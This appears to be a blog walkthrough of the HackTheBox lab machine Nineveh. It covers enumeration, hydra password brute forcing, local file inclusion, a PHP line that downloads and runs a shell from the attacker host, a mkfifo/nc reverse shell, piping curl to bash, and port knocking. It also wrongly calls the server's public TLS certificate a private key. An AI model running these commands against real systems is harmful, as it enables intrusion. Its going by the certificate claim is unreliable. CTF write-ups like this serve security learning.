This page looks best with JavaScript enabled

Hackthebox - Nineveh

 ·  ☕ 5 min read  ·  👤 Hong
Hackthebox - Nineveh

Enumeration

1

nmap -sV -sC -O -vv 10.10.10.43 -oA nineveh

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

PORT    STATE SERVICE  REASON         VERSION
80/tcp  open  http     syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open  ssl/http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR/emailAddress=admin@nineveh.htb/organizationalUnitName=Support/localityName=Athens
| Issuer: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR/emailAddress=admin@nineveh.htb/organizationalUnitName=Support/localityName=Athens
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-07-01T15:03:30
| Not valid after:  2018-07-01T15:03:30
| MD5:   d182 94b8 0210 7992 bf01 e802 b26f 8639
| SHA-1: 2275 b03e 27bd 1226 fdaa 8b0f 6de9 84f0 113b 42c0
| -----BEGIN CERTIFICATE-----
| MIID+TCCAuGgAwIBAgIJANwojrkai1UOMA0GCSqGSIb3DQEBCwUAMIGSMQswCQYD
| VQQGEwJHUjEPMA0GA1UECAwGQXRoZW5zMQ8wDQYDVQQHDAZBdGhlbnMxFzAVBgNV
| BAoMDkhhY2tUaGVCb3ggTHRkMRAwDgYDVQQLDAdTdXBwb3J0MRQwEgYDVQQDDAtu
| aW5ldmVoLmh0YjEgMB4GCSqGSIb3DQEJARYRYWRtaW5AbmluZXZlaC5odGIwHhcN
| MTcwNzAxMTUwMzMwWhcNMTgwNzAxMTUwMzMwWjCBkjELMAkGA1UEBhMCR1IxDzAN
| BgNVBAgMBkF0aGVuczEPMA0GA1UEBwwGQXRoZW5zMRcwFQYDVQQKDA5IYWNrVGhl
| Qm94IEx0ZDEQMA4GA1UECwwHU3VwcG9ydDEUMBIGA1UEAwwLbmluZXZlaC5odGIx
| IDAeBgkqhkiG9w0BCQEWEWFkbWluQG5pbmV2ZWguaHRiMIIBIjANBgkqhkiG9w0B
| AQEFAAOCAQ8AMIIBCgKCAQEA+HUDrGgG769A68bslDXjV/uBaw18SaF52iEz/ui2
| WwXguHnY8BS7ZetS4jAso6BOrGUZpN3+278mROPa4khQlmZ09cj8kQ4k7lOIxSlp
| eZxvt+R8fkJvtA7e47nvwP4H2O6SI0nD/pGDZc05i842kOc/8Kw+gKkglotGi8ZO
| GiuRgzyfdaNSWC7Lj3gTjVMCllhc6PgcQf9r7vK1KPkyFleYDUwB0dwf3taN0J2C
| U2EHz/4U1l40HoIngkwfhFI+2z2J/xx2JP+iFUcsV7LQRw0x4g6Z5WFWETluWUHi
| AWUZHrjMpMaXs3TZNNW81tWUP2jBulX5kv6H5CTocsXgyQIDAQABo1AwTjAdBgNV
| HQ4EFgQUh0YSfVOI05WyOFntGykwc3/OzrMwHwYDVR0jBBgwFoAUh0YSfVOI05Wy
| OFntGykwc3/OzrMwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAehma
| AJKuLeAHqHAIcLopQg9mE28lYDGxf+3eIEuUAHmUKs0qGLs3ZTY8J77XTxmjvH1U
| qYVXfZSub1IG7LgUFybLFKNl6gioKEPXXA9ofKdoJX6Bar/0G/15YRSEZGc9WXh4
| Xh1Qr3rkYYZj/rJa4H5uiWoRFofSTNGMfbY8iF8X2+P2LwyEOqThypdMBKMiIt6d
| 7sSuqsrnQRa73OdqdoCpHxEG6antne6Vvz3ALxv4cI7SqzKiQvH1zdJ/jOhZK1g1
| CxLUGYbNsjIJWSdOoSlIgRswnu+A+O612+iosxYaYdCUZ8BElgjUAXLEHzuUFtRb
| KrYQgX28Ulf8OSGJuA==
|_-----END CERTIFICATE-----
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
| tls-alpn:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.18 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete

Directory Enum

1
2
3
4
5

dirb http://10.10.10.43/

+ http://10.10.10.43/index.html (CODE:200|SIZE:178)
+ http://10.10.10.43/info.php (CODE:200|SIZE:83767)
+ http://10.10.10.43/server-status (CODE:403|SIZE:299)

1
2
3
4
5

dirb https://10.10.10.43/

==> DIRECTORY: https://10.10.10.43/db/
+ https://10.10.10.43/index.html (CODE:200|SIZE:49)
+ https://10.10.10.43/server-status (CODE:403|SIZE:300)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

gobuster dir -u http://10.10.10.43/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

	Gobuster v3.1.0
	by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
	===============================================================
	[+] Url:                     http://10.10.10.43/
	[+] Method:                  GET
	[+] Threads:                 10
	[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
	[+] Negative Status codes:   404
	[+] User Agent:              gobuster/3.1.0
	[+] Timeout:                 10s
	===============================================================
	2022/02/22 20:17:21 Starting gobuster in directory enumeration mode
	===============================================================
	/department

Dirbuster

Brute force -> /department

1
2
3
4
5

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password\!" # \ -> escaping the the ! character
	-> login: admin | password: 1q2w3e4r5t
	-> http://10.10.10.43/department/login.php

	-> [80][http-post-form] host: 10.10.10.43   login: admin   password: 1q2w3e4r5t

login: admin | password: 1q2w3e4r5t

LFI

  • Create a New Database hack.php
  • Create a new table and insert a text field with default value:
  • We can rename the database to ninevehNotes.php
  • Visiting → notes=/var/tmp/ninevehNotes.php

1

http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt../../../../../../../etc/passwd

Exploitation

Reverse Shell

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

locate php revese

cp /usr/share/webshells/php/php-reverse-shell.php ./

mv php-reverse-shell.php shell.txt

# Modify php shell with correct IP

nc -lvnp 1234

python -m SimpleHTTPServer
  • Edit the table with the following
1

<?php system("wget http://10.10.14.38:8000/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?>


1
2

# Fire the shell by visiting the url
http://10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes.php

Interactive Shell

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

which python
which python3

python3 -c 'import pty; pty.spawn("/bin/bash")'

CTRL + Z

stty raw -echo
fg
[Press Enter]

export TERM=screen

Privelege Escalation

  • There is a report folder

1

ps aux

  • Found sshd but there was no ssh during nmap
1
2
3

ls /usr/sbin
	-> knock
	-> chroot

1

www-data@nineveh$ cd /tmp # upload executable reverse shell

1
2
3
4
5

nano update

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.50 9000 >/tmp/f

nc -lvnp 9000

1
2

www-data@nineveh:/tmp$ wget http://10.10.14.50:8000/update
chmod +x update

Port Knocking

1
2
3

# Running the LinEnum.sh on the attacking machine

curl 10.10.14.38:8000/LinEnum.sh | bash


 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

locate knockd

-> /etc/knockd.conf
	/etc/default/knockd
	/etc/init.d/knockd

cat /etc/knockd.conf

	-> logfile = /var/log/knockd.log
		 interface = ens160

		[openSSH]
		 sequence = 571, 290, 911
		 seq_timeout = 5
		 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
		 tcpflags = syn

		[closeSSH]
		 sequence = 911,290,571
		 seq_timeout = 5
		 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
		 tcpflags = syn

  • Sequence 571, 290, 911

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

for x in 571 290 911; do nmap -Pn --max-retries 0 -p $x 10.10.10.43; done

------------------------------------------------------------
	PORT    STATE    SERVICE
	571/tcp filtered umeter

	Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds
	Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-25 16:08 EST
	Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
	Nmap scan report for 10.10.10.43
	Host is up.

	PORT    STATE    SERVICE
	290/tcp filtered unknown

	Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds
	Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-25 16:08 EST
	Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
	Nmap scan report for 10.10.10.43
	Host is up.

	PORT    STATE    SERVICE
	911/tcp filtered xact-backup
------------------------------------------------------------

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

# in the nmap scan we found a private certificate
nano id_rsa

| -----BEGIN CERTIFICATE-----
| MIID+TCCAuGgAwIBAgIJANwojrkai1UOMA0GCSqGSIb3DQEBCwUAMIGSMQswCQYD
| VQQGEwJHUjEPMA0GA1UECAwGQXRoZW5zMQ8wDQYDVQQHDAZBdGhlbnMxFzAVBgNV
| BAoMDkhhY2tUaGVCb3ggTHRkMRAwDgYDVQQLDAdTdXBwb3J0MRQwEgYDVQQDDAtu
| aW5ldmVoLmh0YjEgMB4GCSqGSIb3DQEJARYRYWRtaW5AbmluZXZlaC5odGIwHhcN
| MTcwNzAxMTUwMzMwWhcNMTgwNzAxMTUwMzMwWjCBkjELMAkGA1UEBhMCR1IxDzAN
| BgNVBAgMBkF0aGVuczEPMA0GA1UEBwwGQXRoZW5zMRcwFQYDVQQKDA5IYWNrVGhl
| Qm94IEx0ZDEQMA4GA1UECwwHU3VwcG9ydDEUMBIGA1UEAwwLbmluZXZlaC5odGIx
| IDAeBgkqhkiG9w0BCQEWEWFkbWluQG5pbmV2ZWguaHRiMIIBIjANBgkqhkiG9w0B
| AQEFAAOCAQ8AMIIBCgKCAQEA+HUDrGgG769A68bslDXjV/uBaw18SaF52iEz/ui2
| WwXguHnY8BS7ZetS4jAso6BOrGUZpN3+278mROPa4khQlmZ09cj8kQ4k7lOIxSlp
| eZxvt+R8fkJvtA7e47nvwP4H2O6SI0nD/pGDZc05i842kOc/8Kw+gKkglotGi8ZO
| GiuRgzyfdaNSWC7Lj3gTjVMCllhc6PgcQf9r7vK1KPkyFleYDUwB0dwf3taN0J2C
| U2EHz/4U1l40HoIngkwfhFI+2z2J/xx2JP+iFUcsV7LQRw0x4g6Z5WFWETluWUHi
| AWUZHrjMpMaXs3TZNNW81tWUP2jBulX5kv6H5CTocsXgyQIDAQABo1AwTjAdBgNV
| HQ4EFgQUh0YSfVOI05WyOFntGykwc3/OzrMwHwYDVR0jBBgwFoAUh0YSfVOI05Wy
| OFntGykwc3/OzrMwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAehma
| AJKuLeAHqHAIcLopQg9mE28lYDGxf+3eIEuUAHmUKs0qGLs3ZTY8J77XTxmjvH1U
| qYVXfZSub1IG7LgUFybLFKNl6gioKEPXXA9ofKdoJX6Bar/0G/15YRSEZGc9WXh4
| Xh1Qr3rkYYZj/rJa4H5uiWoRFofSTNGMfbY8iF8X2+P2LwyEOqThypdMBKMiIt6d
| 7sSuqsrnQRa73OdqdoCpHxEG6antne6Vvz3ALxv4cI7SqzKiQvH1zdJ/jOhZK1g1
| CxLUGYbNsjIJWSdOoSlIgRswnu+A+O612+iosxYaYdCUZ8BElgjUAXLEHzuUFtRb
| KrYQgX28Ulf8OSGJuA==
|_-----END CERTIFICATE-----

1
2
3

git clone https://github.com/grongor/knock

python3 knock 10.10.10.43 571 290 911

Skills Learned

  • HTTP-based brute forcing
  • Chaining exploits
  • Local file inclusion
  • Port knocking
Hong Woo
WRITTEN BY
Hong
📚Cybersecurity Student🚩CTF Player☁️Cloud Computing

See Also

©2023, All Rights Reserved